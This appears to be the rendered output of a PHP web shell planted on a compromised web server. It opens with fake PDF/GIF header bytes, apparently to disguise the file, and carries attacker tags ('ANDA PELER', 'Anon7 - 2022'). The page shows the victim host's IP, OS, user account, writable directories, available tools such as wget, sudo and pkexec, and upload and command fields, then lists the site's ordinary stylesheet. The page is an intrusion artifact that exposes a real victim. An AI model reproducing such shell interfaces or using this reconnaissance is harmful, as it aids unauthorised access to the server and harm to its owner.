%PDF-1.7 GIF89;
ANDA PELER
Server IP : 5.161.254.237  /  Your IP : 216.73.216.252
Web Server : Apache
System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : stellasp ( 1131)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/stellasp/public_html/frontend/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/stellasp/public_html/frontend/css/style.css
.responsive-img {
  width: 100%;
}

* {
  margin: 0px;
  padding: 0px;
}

body {
  font-family: "Archivo Narrow", sans-serif;
}

ul.nav, ul.nav li, ul.nav li:before, ul, li {
  list-style-type: none;
  margin: 0px;
  padding: 0px;
  list-style: none !important;
}

a {
  border-bottom: none;
  color: #000000;
  text-decoration: none;
}

.clearfix:before,
.clearfix:after {
  content: " ";
  display: table;
}

.clearfix:after {
  clear: both;
}

.clearfix {
  *zoom: 1;
}

.logo {
  padding: 0px 10px;
  height: 85px;
  margin-top: -17px;
}

.logo img {
  width: 260px;
  height: 65px;
  margin-top: 10px;
}

.c-nav {
  font-family: "Archivo Narrow", sans-serif !important;
}

.c-nav_menu_button {
  font-size: 14px;
}

.c-nav_menu {
  margin: 0px;
}

.search {
  height: 60px;
  border: 2px solid #05ce7c;
}

.main-banner {
  padding-top: 85px;
}

.c-nav_banner {
  background: #fff;
}

.c-nav_menu_button {
  color: #000;
}

.c-nav_burger_item, .c-nav_burger_item:nth-child(2)::after {
  background: #000;
}

.heading {
  padding: 40px 0;
  text-align: center;
  font-family: "Archivo Black", sans-serif;
  font-size: 50px;
  color: #000;
  text-transform: uppercase;
}

@media only screen and (max-width: 479px) {
  .heading {
    font-size: 24px;
  }
}

.products-wraper {
  font-family: "Archivo Narrow", sans-serif;
}

.products-wraper a {
  color: #000;
  text-transform: uppercase;
}

.products-wraper a:hover {
  text-decoration: none;
}

.products-wraper h2 {
  margin-bottom: 0px;
  padding: 10px 3px 5px 3px;
  font-size: 20px;
}

.products-wraper p {
  padding: 0 3px;
  font-size: 18px;
}

.products-wraper:hover a {
  color: #05ce7c;
}

.products-wraper img {
  -webkit-transition: all 0.3s ease;
  -moz-transition: all 0.3s ease;
  -ms-transition: all 0.3s ease;
  -o-transition: all 0.3s ease;
}

.owl-theme .owl-dots .owl-dot.active span, .owl-theme .owl-dots .owl-dot:hover span {
  background-color: #05ce7c;
}

.promo-video-section {
  background: url(../images/promo-video.jpg) no-repeat top center;
  background-size: cover;
  height: 1000px;
  background-attachment: fixed;
}

.main-categories-section {
  margin: 75px 30px;
}

.innovation img {
  margin: 30px 0;
}

.innovation h4 {
  color: #111a25;
  font-family: "Archivo Narrow", sans-serif;
  font-weight: 500;
  font-size: 5vw;
  margin: 30px 0;
}

.innovation p {
  color: #111a25;
  font-family: "Archivo Narrow", sans-serif;
  font-size: 24px;
}

.owl-carousel-1 {
  overflow: hidden;
}

.owl-stage {
  display: flex;
}

.circle img {
  position: absolute;
  top: 5px;
  left: -15px;
  z-index: 999999 !important;
}

.product-thumbnail {
  position: relative;
  overflow: hidden;
}

.product-thumbnail .mask {
  width: 100%;
  height: 100%;
  position: absolute;
  top: 0;
  left: 0;
  margin-top: -200%;
  /*border-radius:5px;*/
  background-color: rgba(5, 206, 124, 0.75);
}

.item:hover .mask {
  margin-top: 0;
}

.mask {
  -webkit-transition: all 0.7s ease;
  transition: all 0.7s ease;
  display: flex;
  justify-content: center;
  align-items: center;
  align-content: center;
  transform: rotate(360deg);
}

.mask img {
  -webkit-transition: .1s;
  transition: .5s;
  -webkit-transform: rotate(360deg);
  transform: rotate(360deg);
}

.item:hover .mask img {
  opacity: 1;
  top: -0px;
  -webkit-transform: rotate(360deg) !important;
  transform: rotate(360deg) !important;
}

.products-wraper:hover {
  position: relative;
  -webkit-transition: all 0.3s ease;
  -moz-transition: all 0.3s ease;
  -ms-transition: all 0.3s ease;
  -o-transition: all 0.3s ease;
}

.production-steps {
  background: #05ce7c;
  padding: 30px 40px 100px 40px;
}

.production-steps h4 {
  font-size: 5vw;
  color: #fff;
  text-transform: uppercase;
}

footer {
  margin: 50px 0 0 0;
  background: #05ce7c;
  padding: 40px 0;
}

footer .footer-top-section {
  padding: 20px 0 60px;
  border-bottom: 1px solid #fff;
}

.col-new-5 {
  -ms-flex: 0 0 20%;
  flex: 0 0 20%;
  max-width: 20%;
}

.footer-col {
  padding: 0 20px 0 0;
}

.footer-col h4 {
  font-size: 20px;
  font-family: "Archivo Narrow", sans-serif;
  color: #fff;
  text-transform: uppercase;
  border-bottom: 1px solid #000;
  padding: 0 0 10px 0;
  margin-bottom: 25px;
}

.footer-col ul, .footer-col li {
  list-style: none;
  list-style-type: none;
}

.footer-col ul li a {
  font-family: "Archivo Narrow", sans-serif;
  color: #000;
  font-size: 16px;
  line-height: 30px;
}

.footer-col ul li a:hover {
  color: #fff;
}

.copy-right-footer {
  padding: 40px 0 10px 0;
}

.copy-right-footer .copyright {
  font-family: "Archivo Narrow", sans-serif;
  font-size: 16px;
}

.copy-right-footer .copyright p {
  color: #000;
}

.copy-right-footer .copyright p a {
  color: #fff;
}

.copy-right-footer .copyright p a:hover {
  color: #000;
}

.social-media {
  list-style-type: none;
  list-style: none;
  display: flex;
  justify-content: start;
  align-content: center;
  align-items: center;
}

.social-media li {
  margin: 15px 10px 15px 0px;
  display: flex;
  font-size: 25px;
  justify-content: center;
  align-items: center;
  border: 1px solid #fff;
  width: 45px;
  height: 45px;
  border-radius: 360px;
}

.social-media li a {
  color: #fff;
}

.social-media li a:hover {
  color: #000;
}

.news-letter {
  font-family: "Archivo Narrow", sans-serif;
  color: #fff;
}

.news-letter h5 {
  color: #fff;
  font-size: 25px;
  font-family: "Archivo Narrow", sans-serif;
  margin: 0 0 15px 0;
}

.news-letter .news-letter-field {
  height: 50px;
  width: 80%;
  float: left;
  padding: 0 5px;
  font-family: "Archivo Narrow", sans-serif;
  color: #fff;
  background-color: #01b56c;
}

.news-letter .signup-button {
  width: 20%;
  float: left;
  color: #000;
  background: #fff;
  height: 50px;
  text-transform: uppercase;
  font-family: "Archivo Narrow", sans-serif;
}

.news-letter .signup-button:hover {
  color: #fff;
  background: #000;
}

#example5 {
  padding: 100px 0 0 0;
}

.categoies-main-wraper {
  padding-bottom: 50px;
}

.categoies-main-wraper .custom-product {
  margin: 15px 0;
}

.categoies-main-wraper .custom-product h2 {
  text-align: center;
  background: rgba(0, 0, 0, 0.7);
  color: #fff;
  padding: 15px 0;
}

.categoies-main-wraper .custom-product h2 a {
  display: block;
  color: #fff;
}

.categoies-main-wraper .custom-product h2 a:hover {
  color: #05ce7c;
  text-decoration: none;
}

.custom-product .custom-pro-thumbnail {
  width: 100%;
  position: relative;
  -webkit-transition: all 0.3s ease;
  -moz-transition: all 0.3s ease;
  -ms-transition: all 0.3s ease;
  -o-transition: all 0.3s ease;
}

.custom-product .custom-pro-thumbnail .over-lap-text {
  position: absolute;
  bottom: 100%;
  left: 0;
  right: 0;
  background-color: rgba(0, 0, 0, 0.6);
  overflow: hidden;
  width: 100%;
  height: 0;
  transition: .5s ease;
  color: #fff;
  text-align: center;
  text-transform: uppercase;
}

.custom-product .custom-pro-thumbnail:hover .over-lap-text {
  bottom: 0;
  height: 100%;
}

.custom-product .custom-pro-thumbnail:hover .over-lap-text a {
  color: #05ce7c;
}

.custom-product .custom-pro-thumbnail .text {
  border: 2px solid #fff;
  padding: 5px 20px;
  color: white;
  font-size: 20px;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%);
  text-align: center;
}

.custom-heading {
  width: 100%;
  font-weight: 900;
  font-size: 7vw;
  color: #06cf7f;
  text-shadow: 2px 3px 3px #09ae6c;
  text-transform: uppercase;
  text-align: center;
  padding-top: 1rem;
}

.filter-toggle {
  font-family: "Archivo Narrow", sans-serif;
  font-size: 22px;
}

.filter-toggle:hover {
  color: #000;
  text-decoration: none;
}

.contact-main-wraper {
  padding: 110px 0 0 0;
}

.comp-addres {
  position: relative;
  margin-top: 100px;
}

.comp-addres:before {
  content: "\f18e";
  font-family: FontAwesome;
  color: #05ce7c;
  position: absolute;
  right: -15px;
  top: 50px;
  font-size: 25px;
}

.comp-addres address {
  color: #aeaeae;
  text-transform: uppercase;
}

.comp-addres address strong {
  color: #05ce7c;
}

.comp-contacts address strong {
  display: inline-block;
  width: 120px;
  font-weight: 600;
  color: #2f2f2f;
}

.comp-email i.fa {
  font-size: 50px;
  display: inline-block;
}

.comp-email a {
  color: #05ce7c;
}

.company-msg h6 {
  color: #353535;
  text-transform: uppercase;
  margin-bottom: 15px;
  font-size: 35px;
  padding-left: 10px;
}

.comp-fileds {
  width: 50%;
  padding: 0 10px;
  float: left;
}

.sendbtn {
  color: #4c4c4c;
  font-size: 30px;
  position: relative;
  display: block;
  text-align: right;
}

.sendbtn span {
  display: inline-block;
  width: 40px;
  height: 40px;
  text-align: center;
  background: #fff;
  padding-top: 0px;
  border-radius: 360px;
}

.contactus-filed-wraper {
  padding: 100px 0;
  background: #f0f0f0;
}

.comp-contacts:before {
  content: "\f18e";
  font-family: FontAwesome;
  color: #05ce7c;
  position: absolute;
  right: -15px;
  top: 0px;
  font-size: 25px;
}

@media (max-width: 599px) {
  .logo {
    margin-top: 0px;
    padding: 0px 10px;
  }
  .logo img {
    width: 260px;
    height: 65px;
  }
  .inside-wraper {
    height: auto !important;
  }
  .production-steps {
    margin-bottom: 20px;
  }
}

.contactus-inner-banner {
  padding-top: 120px;
  position: relative;
}

.brands-history-sec {
  padding-top: 120px;
}

.banner-text {
  position: absolute;
  top: 40%;
  bottom: 50%;
  width: 100%;
}

.banner-text h4 {
  text-align: center;
  font-size: 5vw;
  color: #fff;
  text-transform: uppercase;
}

.MagicZoom, figure.mz-figure {
  width: 50%;
  margin: 10px auto !important;
  display: block !important;
}

figure.mz-figure img {
  margin: 0 auto !important;
}

.different-views {
  width: 320px;
  margin: 0px auto;
}

.different-views ul > li {
  float: left;
  width: 75px;
  margin: 5px 0 0 5px;
}

.pro-description {
  margin: 25px 0;
  padding: 20px 0;
}

.pro-description .large-product-title {
  width: 100%;
}

.pro-description .large-product-title h2 {
  padding: 0px;
  font-size: 25px;
  text-transform: uppercase;
  display: block;
}

.breadcrums-section {
  margin-top: 86px;
}

.inquiry-btn {
  background: #05ce7c !important;
  border: 1px solid #05ce7c;
}

.breadcrumb, ul, ol {
  margin: 0px;
}

Anon7 - 2022
SCDN GOK